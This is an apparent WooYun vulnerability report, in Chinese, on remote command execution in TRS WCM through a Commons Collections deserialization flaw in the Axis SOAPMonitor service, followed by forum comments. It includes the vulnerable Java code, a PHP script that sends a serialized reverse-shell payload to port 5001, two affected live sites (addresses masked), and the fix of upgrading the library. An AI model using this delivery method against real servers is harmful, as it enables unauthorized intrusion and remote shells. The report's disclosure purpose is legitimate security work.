TRSWCM远程命令执行漏洞

其实就是common-collections中的反序列化漏洞。

LIB目录中有commons-collections.jar不是最新版本，因此存在反序列化漏洞，漏洞触发在SOAPMonitor中，web.xml配置如下：

<servlet> 
     <servlet-name>SOAPMonitorService</servlet-name>  
     <servlet-class>org.apache.axis.monitor.SOAPMonitorService</servlet-class>  
     <init-param> 
       <param-name>SOAPMonitorPort</param-name>  
       <param-value>5001</param-value> 
     </init-param>  
     <load-on-startup>100</load-on-startup> 
   </servlet>
   <servlet-mapping> 
     <servlet-name>SOAPMonitorService</servlet-name>  
     <url-pattern>/SOAPMonitor</url-pattern> 
   </servlet-mapping>

可以看到SOAPMonitor会监听5001端口在org.apache.axis.monitor.SOAPMonitorService中代码如下：

public void init()
     throws ServletException
   {
     if (connections == null)
     {
       connections = new Vector();
     }
     if (server_socket == null)
     {
       ServletConfig config = super.getServletConfig();
       String port = config.getInitParameter("SOAPMonitorPort");
       if (port == null)
       {
         port = "0";
       }
       try
       {
         server_socket = new ServerSocket(Integer.parseInt(port));
       }
       catch (Exception e)
       {
         server_socket = null;
       }
       if (server_socket != null)
       {
         new Thread(new ServerSocketThread()).start();
       }
     }
   }
 
 class ConnectionThread
     implements Runnable
   {
     private Socket socket = null;
     private ObjectInputStream in = null;
     private ObjectOutputStream out = null;
     private boolean closed = false;
 
     public ConnectionThread(Socket s)
     {
       this.socket = s;
       try
       {
         this.out = new ObjectOutputStream(this.socket.getOutputStream());
         this.out.flush();
         this.in = new ObjectInputStream(this.socket.getInputStream());
       } catch (Exception e) {
       }
       synchronized (SOAPMonitorService.connections) {
         SOAPMonitorService.connections.addElement(this);
       }
     }
 
   public void run()
     {
       try
       {
         Object o;
         while (!this.closed)
           o = this.in.readObject();
       }
       catch (Exception e) {
       }
       synchronized (SOAPMonitorService.connections) {
         SOAPMonitorService.connections.removeElement(this);
       }
 
       if (this.out != null) {
         try {
           this.out.close(); } catch (IOException ioe) {
         }
         this.out = null;
       }
       if (this.in != null) {
         try {
           this.in.close(); } catch (IOException ioe) {
         }
         this.in = null;
       }
 
       close();
     }

其中o = this.in.readObject();从this.socket.getInputStream()读取数据，触发了漏洞。

因此在利用的时候需要访问服务器的5001端口，有时候也不一定是5001端口，可以直接访问SOAPMonitor在返回中可以直接得到端口：

public void doGet(HttpServletRequest request, HttpServletResponse response)
     throws IOException, ServletException
   {
     int port = 0;
     if (server_socket != null) {
       port = server_socket.getLocalPort();
     }
     response.setContentType("text/html");
     response.getWriter().println("<html>");
     response.getWriter().println("<head>");
     response.getWriter().println("<title>SOAP Monitor</title>");
     response.getWriter().println("</head>");
     response.getWriter().println("<body>");
     response.getWriter().println("<object classid=/"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93/" width=100% height=100% codebase=/"http://**.**.**.**/products/plugin/1.3/jinstall-13-win32.cab#Version=1,3,0,0/">");
     response.getWriter().println("<param name=code value=SOAPMonitorApplet.class>");
     response.getWriter().println("<param name=/"type/" value=/"application/x-java-applet;version=1.3/">");
     response.getWriter().println("<param name=/"scriptable/" value=/"false/">");
     response.getWriter().println("<param name=/"port/" value=/"" + port + "/">");
     response.getWriter().println("<comment>");
     response.getWriter().println("<embed type=/"application/x-java-applet;version=1.3/" code=SOAPMonitorApplet.class width=100% height=100% port=/"" + port + "/" scriptable=false pluginspage=/"http://**.**.**.**/products/plugin/1.3/plugin-install.html/">");
     response.getWriter().println("<noembed>");
     response.getWriter().println("</comment>");
     response.getWriter().println("</noembed>");
     response.getWriter().println("</embed>");
     response.getWriter().println("</object>");
     response.getWriter().println("</body>");
     response.getWriter().println("</html>");
   }

http://**.**.**.**/wcm/SOAPMonitor

EXP用的是http://**.**.**.**/content/23905反弹shell，以http://**.**.**.**/wcm/为例进行测试。

用EXP生成hi.bin文件，再往**.**.**.**的5001端口发送此文件即可：

<?php 
 function http_send($host,$port,$packet,$isSsl)
 {
  if($isSsl){
   $sock = fsockopen("ssl://".$host, $port);
  }else{
   $sock = fsockopen($host, $port);
  }
  while (!$sock)
  {
   $sock = fsockopen($host, $port);
  }
  fputs($sock, $packet);
  while (!feof($sock)) 
  @$resp .= fread($sock, 1024);
  fclose($sock);
  //print $resp;
  return $resp;
 }
 
 $host=$argv[1];
 echo $host."/r/n";
 $data=file_get_contents("C:/java/hi.bin");
 echo http_send($host,5001,$data,0);
 ?>

然后查看本地监听的443端口，此时已经返回shell：

列两个受影响的站点，更多的没有去匹配了。

http://**.**.**.**:8090/wcm/app/login.jsp
 http://**.**.**.**/wcm/app/login.jsp

同上

升级commons-collections.jar到3.2.2版本

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-12-26 16:56

厂商回复：

漏洞Rank：15 (WooYun评价)

最新状态：

2016-03-07：问题已确认,因漏洞确认失效时间在周末,未能及时处理,导致平台认定为忽略,已和平台进行联系,说明情况.感谢作者的发现.

1. 2016-03-01 09:03 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

   2

   屌屌屌

   1# 回复此人

2. 2016-03-01 09:06 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

   3

   洞主收徒不？我送你8位情侣QQ

   2# 回复此人

3. 2016-03-01 09:09 | 玉林嘎 ( 普通白帽子 | Rank:941 漏洞数:108 )

   2

   要雷

   3# 回复此人

4. 2016-03-01 09:23 | pudding2 ( 普通白帽子 | Rank:147 漏洞数:51 | 凡心所向，素履所往，生如逆旅，一苇以航)

   2

   求带

   4# 回复此人

5. 2016-03-01 09:42 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

   2

   666666

   5# 回复此人

6. 2016-03-01 09:51 | 枫子 ( 路人 | Rank:14 漏洞数:5 | 酱油安全爱好者一枚。)

   2

   前排围观了

   6# 回复此人

7. 2016-03-01 09:59 | Me_Fortune ( 普通白帽子 | Rank:361 漏洞数:115 | The quiter you are,the more you're able ...)

   2

   洞主收徒不？我送你8位情侣QQ

   7# 回复此人

8. 2016-03-01 10:00 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

   3

   洞主收徒不？我送你8位情侣TT

   8# 回复此人

9. 2016-03-01 10:02 | 欧冠狂魔阿森纳 ( 实习白帽子 | Rank:87 漏洞数:37 | 静静的看你们装逼)

   2

   卧槽 一大波政府站又要被日了

   9# 回复此人

10. 2016-03-01 10:09 | D_in ( 普通白帽子 | Rank:423 漏洞数:65 | 到我嘴里来)

    2

    洞主收徒不？我送你8位情侣QQ

    10# 回复此人

11. 2016-03-01 10:30 | whitemonty ( 路人 | Rank:11 漏洞数:5 | Secur1ty just lik3 a girl. B0th of th3m ...)

    2

    TRS 和你什么仇什么怨，挖他们那么多远程命令执行

    11# 回复此人

12. 2016-03-01 10:33 | 大亮 ( 普通白帽子 | Rank:386 漏洞数:73 | 小段子手)

    3

    洞主收徒不？我可以引荐你到拓尔思工作。

    12# 回复此人

13. 2016-03-01 10:50 | Wens0n ( 普通白帽子 | Rank:102 漏洞数:23 | 精华漏洞数:32 | WooYun认证√ 舞蹈系教授)

    2

    TRS 和你什么仇什么怨，挖他们那么多远程命令执行

    13# 回复此人

14. 2016-03-01 10:58 | applychen ( 普通白帽子 | Rank:667 漏洞数:57 | 万古漫漫长如夜)

    2

    @大亮 谢谢哈，暂时还没用工作的计划~

    14# 回复此人

15. 2016-03-01 11:26 | 隐形人真忙 ( 普通白帽子 | Rank:201 漏洞数:25 | ...)

    2

    陈老师 求指导java安全

    15# 回复此人

16. 2016-03-01 13:20 | 毛猴 ( 普通白帽子 | Rank:165 漏洞数:55 | 猴哥~~猴哥~~你真了不得 ......)

    2

    大哥 都被你挖怕了！

    16# 回复此人

17. 2016-03-01 13:39 | menmen519 ( 普通白帽子 | Rank:970 漏洞数:166 | http://menmen519.blog.sohu.com/)

    3

    如果是通杀，绝对应该打雷，但是wcm7应该都做了过滤器，除了webservice和插件jsp不做跳转，不过还是赞一个

    17# 回复此人

18. 2016-03-01 14:04 | applychen ( 普通白帽子 | Rank:667 漏洞数:57 | 万古漫漫长如夜)

    3

    @menmen519 wcm7是中招的，一些wcm65也中招。

    18# 回复此人

19. 2016-03-01 15:19 | menmen519 ( 普通白帽子 | Rank:970 漏洞数:166 | http://menmen519.blog.sohu.com/)

    2

    @applychen 牛逼 这个得打雷 wcm 使用量巨大

    19# 回复此人

20. 2016-03-01 16:11 | Dusk ( 实习白帽子 | Rank:35 漏洞数:20 )

    3

    洞主收徒不？我送你8位情侣YY

    20# 回复此人

21. 2016-03-01 16:16 | J4rn4ben ( 路人 | Rank:15 漏洞数:4 | 喜欢在西湖里自由泳的野猪)

    2

    @applychen,私密一个联系方式

    21# 回复此人

22. 2016-03-01 19:06 | 無名老人 ( 路人 | Rank:19 漏洞数:4 | 干过开发，日过渗透，江湖人称： 少女杀手)

    2

    后台命令执行？ ManagementFactory.getRuntimeMXBean

    22# 回复此人

23. 2016-03-01 21:51 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    2

    吊炸天

    23# 回复此人

24. 2016-03-01 23:36 | nick被注册 ( 普通白帽子 | Rank:152 漏洞数:25 | 天一)

    2

    这个牛

    24# 回复此人

25. 2016-03-02 11:09 | cnrstar ( 普通白帽子 | Rank:161 漏洞数:24 | Be my personal best!)

    2

    有本事给我看看是真的假的。O(∩_∩)O~~

    25# 回复此人

26. 2016-03-02 13:40 | Agony ( 路人 | Rank:24 漏洞数:12 | you know a cat has nine lives.)

    3

    洞主收徒不？送你一个机智的徒弟

    26# 回复此人

27. 2016-03-06 11:21 | applychen ( 普通白帽子 | Rank:667 漏洞数:57 | 万古漫漫长如夜)

    2

    忽略……

    27# 回复此人

28. 2016-03-06 11:26 | 千机 ( 普通白帽子 | Rank:681 漏洞数:115 )

    2

    66666666666

    28# 回复此人

29. 2016-03-06 11:33 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

    2

    @applychen 不影响你得分，得$

    29# 回复此人

30. 2016-03-06 11:54 | applychen ( 普通白帽子 | Rank:667 漏洞数:57 | 万古漫漫长如夜)

    2

    @Coody ORZ……

    30# 回复此人

31. 2016-03-06 12:29 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

    2

    @applychen 某个厂商的漏洞一下子多了，肯定都是这样的。

    31# 回复此人

32. 2016-03-07 14:13 | HackPanda ( 普通白帽子 | Rank:117 漏洞数:16 | Talk is cheap,show me the shell.)

    2

    所以说发漏洞要看日子咯

    32# 回复此人

33. 2016-04-30 09:35 | 最爱晴雯 ( 路人 | Rank:2 漏洞数:1 | 学习安全知识)

    0

    66666

    33# 回复此人

34. 2016-05-16 22:46 | 煦阳。 ( 普通白帽子 | Rank:135 漏洞数:29 | 这个人很懒，什么都没留下。)

    0

    exp怎么用... 买了不会用... @applychen

    34# 回复此人

35. 2016-05-16 22:57 | 煦阳。 ( 普通白帽子 | Rank:135 漏洞数:29 | 这个人很懒，什么都没留下。)

    0

    目标机要5001对外网开放么

    35# 回复此人

36. 2016-05-16 23:19 | applychen ( 普通白帽子 | Rank:667 漏洞数:57 | 万古漫漫长如夜)

    0

    @煦阳。 是啊，对外网开放。

    36# 回复此人

37. 2016-05-17 09:25 | cf_hb ( 普通白帽子 | Rank:119 漏洞数:17 | 爱生活，爱安全！)

    0

    伤心了找了好几个站都没测出来

    37# 回复此人